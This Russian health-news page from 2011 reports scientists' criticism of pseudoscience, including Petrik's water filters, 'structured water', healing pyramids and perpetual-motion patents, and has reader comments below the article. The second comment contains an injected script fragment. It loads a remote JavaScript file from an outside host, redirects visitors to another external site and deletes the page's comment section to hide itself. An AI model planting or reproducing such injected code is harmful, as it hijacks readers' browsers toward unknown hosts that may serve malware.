Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ложь чистой воды  >>  Ложь чистой воды
 
Обратная связь
 

Ложь чистой воды

Размер шрифта
28 июля 2011 07:00
  • google_analytics: false
  • Нравится

Ни в одной области знания лженаука не цветет так пышно, как в медицине. В отличие от вечных двигателей тайские таблетки продавать гораздо проще. О структурированной воде, фильтрах Петрика и позоре России рассказали ученые из Комиссии по лженауке.


Александр Тушкин / «Здоровье инфо»

В начале июля Роспотребнадзор признал лучшими фильтры для очистки воды «Золотая формула». Автором разработки является скандально известный «ученый» Виктор Петрик, который может получить на реализацию государственного проекта «Чистая вода» 15 триллионов (!) бюджетных рублей. 
Неожиданное заявление ведомства заставило отреагировать научное сообщество. Во вторник в пресс-центре «Комсомольской правды» состоялась конференция с участием членов Комиссии по борьбе с лженаукой и фальсификацией научных исследований при президиуме РАН. Организация занимается выработкой рекомендаций по спорным вопросам и выступает с публичной критикой псевдонаучных теорий. Членами комиссии являются авторитетные ученые из различных областей науки, однако именно эту пресс-конференцию вели физики-математики. Они обеспокоены тем, с какой скоростью растут сейчас лженаучные проекты, на которые государство тратит гигантские деньги.

– К сожалению, поддержка лженаучных проектов рентабельна. Это многомиллионный бизнес. Чиновники получают за это солидные откаты, – заявил председатель комиссии, академик РАН Эдуард Павлович Кругляков.

По сведениям Комиссии судьба «Чистой воды» еще не решена, так как проект вызвал слишком громкий общественный резонанс. На данный момент Комиссия и Петрик судятся по двум делам. В октябре 2010 года Петрик подал иск о защите деловой репутации, а в апреле 2011 года ученые выдвинули ответное обвинение о причинении морального вреда. Общественные прения Комиссия устраивать не хочет, так как считает, что «стыдить лжеца и шутить над дураком» нельзя.

Вода и все, что с ней связано, вообще излюбленный объект мошенников и «ученых с большой дороги». Эдуард Павлович рассказал, что недавно в Новосибирске молодым управленцам, которые хотят попасть в президентский кадровый резерв, вручили по бутылочке воды со дна Байкала, «прослушавшей» Шестую симфонию Бетховена. Распространением волшебных напитков за 35 долларов и мифов о структурированной воде занимается японский мошенник Эмото Масару.

Впрочем, и в родном отечестве лжемедиков хватает. Генеральный директор научно-производственного объединения «Гидрометприбор» Александр Голод строит по всей стране свои «энергетические пирамиды», которые могут влиять на биологические процессы в живых и неживых материях благодаря своей конструкции. Предметы, побывавшие в такой пирамиде, начинают излучать целебную энергию и даже способны излечивать от рака. Дошло до того, что на Международную космическую станцию – флагман современной науки – отправили камни, облученные в этих пирамидах.

Почему лженаука так распространена?
По мнению Захарова, в России существует миф, что науку могут делать любители. Они предлагают глобальное решение проблем за небольшие деньги. Это выглядит привлекательнее, чем сотня кропотливых исследований, которые маленькими шажками продвигают человечество к настоящим открытиям. История знает единственный пример, когда любитель добился колоссальных результатов: это был австрийский монах Грегор Мендель, открывший законы наследственности.

– Это главный позор России. Мы стали посмешищем для всего мира, – сокрушается Кругляков. Еще одним позором Кругляков назвал запуск спутника «Юбилейный» в 2010 году с «устройством для непрерывного передвижения без расхода рабочего тела». Двигатель получил название «гравицапа» в прессе и наделал много шуму, так как должен был работать вопреки законам физики, создавая тягу в 28 г. Чуда не случилось, а вот конфуз вышел.

– Роспатент щедро раздает патенты на любую ахинею, например, пресловутые вихревые генераторы, которые дают невиданный КПД в 1320%. Да что уж там – Роспатент выдал сотни патентов на вечные двигатели! – восклицает Кругляков.

Если такие проекты находят поддержку на государственном уровне, что уж говорить о насквозь мифологизированном сознании простых россиян.

Откуда в медицине столько шарлатанов?
Ни в одной области знания лженаука не цветет таким пышным цветом и не пользуется таким спросом, как в медицине. Шарлатаны прочно поселились в этой области науки из-за того, что на простофилях просто зарабатывают деньги. Вечные двигатели достаточно трудно продать, в отличие от медицинских товаров, так как здоровье всегда будет оставаться насущной проблемой. Громадную роль в развитии псевдомедицины сыграла человеческая внушаемость, проявляющаяся в эффекте плацебо, и либеральная ситуация на рынке, когда можно безнаказанно обманывать людей. Например, многочисленные биологически активные добавки вообще не требуют медицинской разрешительной документации и клинических испытаний, так как сертифицируются как пищевые добавки.

 –У меня есть ощущение, что российское общество ушло в сторону от цивилизации в сторону дикости. Вот расцвет магов, астрологов показывает, что дела идут у нас не очень хорошо. Падает уровень образования, – грустно подметил Владимир Евгеньевич Захаров.

Первым шагом к преодолению одичания ученые считают создание государственной экспертизы проектов, которые будут финансироваться из госфондов. Хорошо хоть главный инновационный проект страны – центр «Сколково» – пока еще обходится без лженауки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Natusya2238

09 июня 2015 в 07:10

Цитировать   |   Пожаловаться

Действительно актуальна фраза "Как страшно жить..." 

2 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда об острой кишечной инфекции   Как пережить жару дома   Лучшая природная вода для здоровья   Суперпродукты до и после застолья  
02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу 12 апреля 2013Ученые выяснили, из каких кружек лучше пить
 
20 марта 2013А вы знаете, почему пальцы сморщиваются после пребывания в воде 21 декабря 2012Сладкая вода помогает сконцентрироваться
 

Слайдшоу

1
Как пережить жару без кондиционера?!
Как есть и худеть?
Что съесть, чтобы похудеть после 40?

Тесты

1
Что вы знаете о воде?
Есть ли у вас избыточный вес?
Цистит: как с ним бороться
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.